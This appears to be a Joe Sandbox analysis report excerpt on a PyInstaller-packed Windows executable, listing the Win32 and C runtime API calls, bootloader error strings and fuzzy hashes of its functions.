                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d78305762445aa2024c9ca9e9afcb942f742c082f492b61bed92a4f3fb3f7214
                                                                                                                      • Instruction ID: 5d6e0ced38b44cb4de9fca92ae1dd29c779d7989d1452ae117211086e7ed2a9d
                                                                                                                      • Opcode Fuzzy Hash: d78305762445aa2024c9ca9e9afcb942f742c082f492b61bed92a4f3fb3f7214
                                                                                                                      • Instruction Fuzzy Hash: B911CA33F30C255B675C816D8C132BEA1D2EBD824030F533AD826E7284E994DE13D390
                                                                                                                      APIs
                                                                                                                      • GetDialogBaseUnits.USER32 ref: 00F51B0B
                                                                                                                      • MulDiv.KERNEL32(?,00000032,00000004), ref: 00F51B21
                                                                                                                      • MulDiv.KERNEL32(00000000,0000000E,00000008), ref: 00F51B32
                                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F8,000001F8,00000000), ref: 00F51B7B
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00F51B8D
                                                                                                                      • #380.COMCTL32(00000000,00007F01,00000001,?), ref: 00F51BAD
                                                                                                                      • CreateWindowExW.USER32(00000000,STATIC,00000000,50000003,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51BE4
                                                                                                                      • CreateWindowExW.USER32(00000000,STATIC,00000000,50000000,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C17
                                                                                                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,50300884,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C4D
                                                                                                                      • CreateWindowExW.USER32(00000000,BUTTON,Close,50000001,80000000,80000000,80000000,80000000,?,00000001,?,00000000), ref: 00F51C83
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00F51C9D
                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F51CAB
                                                                                                                      • SendMessageW.USER32(?,00000172,00000001,?), ref: 00F51CBC
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CD0
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CE2
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CF4
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51D06
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D13
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D22
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F51D2C
                                                                                                                        • Part of subcall function 00F51E30: GetDC.USER32(?), ref: 00F51E50
                                                                                                                        • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,?), ref: 00F51EA0
                                                                                                                        • Part of subcall function 00F51E30: DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                        • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                        • Part of subcall function 00F51E30: ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$Create$MoveObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                      • String ID: @U=u$BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                      • API String ID: 4195728924-25750965
                                                                                                                      • Opcode ID: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction ID: 6898291b3241382566754ad895d9d568f41699417e5133de9651262db7700f52
                                                                                                                      • Opcode Fuzzy Hash: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction Fuzzy Hash: 83612F31680314FAFB315F508C8AF967F65EF08B01F244166BF087D1E6D6B1A524EB6A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3409252457-0
                                                                                                                      • Opcode ID: da27715f46624157067c84503290f6c51094a312082043ba96508b01c9737b4e
                                                                                                                      • Instruction ID: 7eebc7faafd60e2475b944ebb65371d9c55c0f583b754b6d4413a7724ec5b1a3
                                                                                                                      • Opcode Fuzzy Hash: da27715f46624157067c84503290f6c51094a312082043ba96508b01c9737b4e
                                                                                                                      • Instruction Fuzzy Hash: 7DD108B1D00305AFDB24AFA48C42A7E77B4EF513A4F04436DE915A7281EF759902FB61
                                                                                                                      APIs
                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 00F5254A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                      • String ID: %s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s$%s%s%s.exe$%s%s%s.pkg$Archive not found: %s$Archive path exceeds PATH_MAX$Error copying %s$Error extracting %s$Error opening archive %s$malloc
                                                                                                                      • API String ID: 601868998-2292630174
                                                                                                                      • Opcode ID: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction ID: 1037d075f602eea2b7624eb9bc4f1bdeb171a943359c180db230c02fa46f2082
                                                                                                                      • Opcode Fuzzy Hash: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction Fuzzy Hash: EDA12CB29043407AD731D6609C82FBB739CAF56312F444A16FE89C6182E735E60DB6A3
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00F6A9BD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A573
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A585
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A597
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5A9
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5BB
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5CD
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5DF
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A5F1
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A603
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A615
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A627
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A639
                                                                                                                        • Part of subcall function 00F6A556: _free.LIBCMT ref: 00F6A64B
                                                                                                                      • _free.LIBCMT ref: 00F6A9B2
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A9D4
                                                                                                                      • _free.LIBCMT ref: 00F6A9E9
                                                                                                                      • _free.LIBCMT ref: 00F6A9F4
                                                                                                                      • _free.LIBCMT ref: 00F6AA16
                                                                                                                      • _free.LIBCMT ref: 00F6AA29
                                                                                                                      • _free.LIBCMT ref: 00F6AA37
                                                                                                                      • _free.LIBCMT ref: 00F6AA42
                                                                                                                      • _free.LIBCMT ref: 00F6AA7A
                                                                                                                      • _free.LIBCMT ref: 00F6AA81
                                                                                                                      • _free.LIBCMT ref: 00F6AA9E
                                                                                                                      • _free.LIBCMT ref: 00F6AAB6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 161543041-0
                                                                                                                      • Opcode ID: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction ID: e88cd75c6dfd204880a4730d51d68dcdc0daebf378c8f37d7e13b59bb38a45cb
                                                                                                                      • Opcode Fuzzy Hash: 9e2d21f223b1bf30d39df4c90266986528b70c7ce6b36e366706a4ddff4833e0
                                                                                                                      • Instruction Fuzzy Hash: E6313D31A00701DFEB21AA79DD46B6673F9EF40360F25442AE099E7162DF79BD80EB11
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction ID: 5e8c8626dd12c0caeb55a6d46a736fc720485e1b6ae1456b399be6d4d573e1fb
                                                                                                                      • Opcode Fuzzy Hash: 37834a7e49c7c2683572fd89d82a79cfd57187240c9370364524ab39d5d94135
                                                                                                                      • Instruction Fuzzy Hash: EB219676900108AFCB41EFA4CC82DEE7BB9EF48344F0041A6B6159B572DB75EB44DB80
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00001000,?,?,?,?,?,00F55A66,?,00000000,?,pyi-runtime-tmpdir), ref: 00F55B1D
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00F55B23
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,00F5142E,?,00000000,00F52AFF,?,?), ref: 00F55BBC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$Variable$CurrentExpandPathProcessStringsTemp_free
                                                                                                                      • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                      • API String ID: 2771213846-1116378104
                                                                                                                      • Opcode ID: e7948cbcb1fb161e5b368f9127e37bc7903ade06f7b8869d148dd58859a56d2e
                                                                                                                      • Instruction ID: d16658bbfa68dbafc81acae506a429a1a9cdd191604794c0d045671d2a34e217
                                                                                                                      • Opcode Fuzzy Hash: e7948cbcb1fb161e5b368f9127e37bc7903ade06f7b8869d148dd58859a56d2e
                                                                                                                      • Instruction Fuzzy Hash: 1C41D372A00B04B7E16076B05C4BF6F35989F85F53F440835FF45A7182FAA8AA0C72A7
                                                                                                                      Strings
                                                                                                                      • malloc, xrefs: 00F51341
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F512CF
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F51306
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F513F2
                                                                                                                      • fread, xrefs: 00F513F7
                                                                                                                      • Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00F5133C
                                                                                                                      • fseek, xrefs: 00F5130B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                      • API String ID: 0-3659356012
                                                                                                                      • Opcode ID: 82c815cc3be57cd793d1eb46e07e4510217462924ac646523b198752caf069e2
                                                                                                                      • Instruction ID: df981358432b7b6d3fcdab9b1473859f20f81adb5b91decf0455604aad4387c6
                                                                                                                      • Opcode Fuzzy Hash: 82c815cc3be57cd793d1eb46e07e4510217462924ac646523b198752caf069e2
                                                                                                                      • Instruction Fuzzy Hash: 5A412B72E003116BEB14AF648C91B2B7798FF40766F048565FE049B642E775FA0CB293
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00F5142E,?,00000000,00F52AFF,?,?,?,?,00000000), ref: 00F557E4
                                                                                                                      Strings
                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00F55855
                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00F557F9
                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00F557B3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                      • API String ID: 2001182103-3498232454
                                                                                                                      • Opcode ID: 5ee21e0b03b93b25bef8ac72ef4e73b9d88e21dff718041967e82cd7cddf670f
                                                                                                                      • Instruction ID: 0775316f8e7b2361801366cbb119a9c9085e343a939174f261a955557ce3968e
                                                                                                                      • Opcode Fuzzy Hash: 5ee21e0b03b93b25bef8ac72ef4e73b9d88e21dff718041967e82cd7cddf670f
                                                                                                                      • Instruction Fuzzy Hash: D2311CB2A406006BE6247374AC47FAB72989F84B12F440535FF09D7282F978E50C92D7
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(?), ref: 00F51E50
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00F51EA0
                                                                                                                      • DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51F95
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001,?,?,?,00000014,00000001), ref: 00F51FCA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2147705588-0
                                                                                                                      • Opcode ID: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction ID: e3f4b86dfca041221862fb3933a24816087f14b65d557c3100a17000a34a8018
                                                                                                                      • Opcode Fuzzy Hash: a541af4a0bd3edb6ee3ccae4f94c33fe04acaef8439d3bec591122df70117b51
                                                                                                                      • Instruction Fuzzy Hash: 69418C71604310AFD724DF2DCC889BBB7E9FB88701F41052EF98AC2291E675AD44E761
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F534A0: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                      • SetDllDirectoryW.KERNEL32(?), ref: 00F531C1
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                      • Opcode ID: 4c4b0b2153d90a0d14d1e2cb2daf23b9758db266b787e27807be679d8d8190bf
                                                                                                                      • Instruction ID: ed3398947a25329c485e641722581280a5255d89ddfcac71a0405a9ef43fc0bf
                                                                                                                      • Opcode Fuzzy Hash: 4c4b0b2153d90a0d14d1e2cb2daf23b9758db266b787e27807be679d8d8190bf
                                                                                                                      • Instruction Fuzzy Hash: 0EB13B72D087416BC711AA749C42BAF77DCAF5475AF040529FF8882142E769E70CB7A3
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F56709
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F5673E
                                                                                                                      Strings
                                                                                                                      • Out of memory., xrefs: 00F56767
                                                                                                                      • Failed to encode wchar_t as UTF-8., xrefs: 00F56760
                                                                                                                      • win32_utils_to_utf8, xrefs: 00F5676C
                                                                                                                      • Failed to get UTF-8 buffer size., xrefs: 00F56773
                                                                                                                      • WideCharToMultiByte, xrefs: 00F56778
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                      • Opcode ID: ec28fa44013c6e1e09b884fb896ab70a358caffb35033fcf37c5922c6e83dc82
                                                                                                                      • Instruction ID: 3b749cbd0952adfff472b126a4938a46b6872cbf4caadd73a4212a003a757894
                                                                                                                      • Opcode Fuzzy Hash: ec28fa44013c6e1e09b884fb896ab70a358caffb35033fcf37c5922c6e83dc82
                                                                                                                      • Instruction Fuzzy Hash: DF313C71644305ABDB106E64BC82F1677D4EB44B26F500536FF54EB2C0EAA5E90CA263
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56AAF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
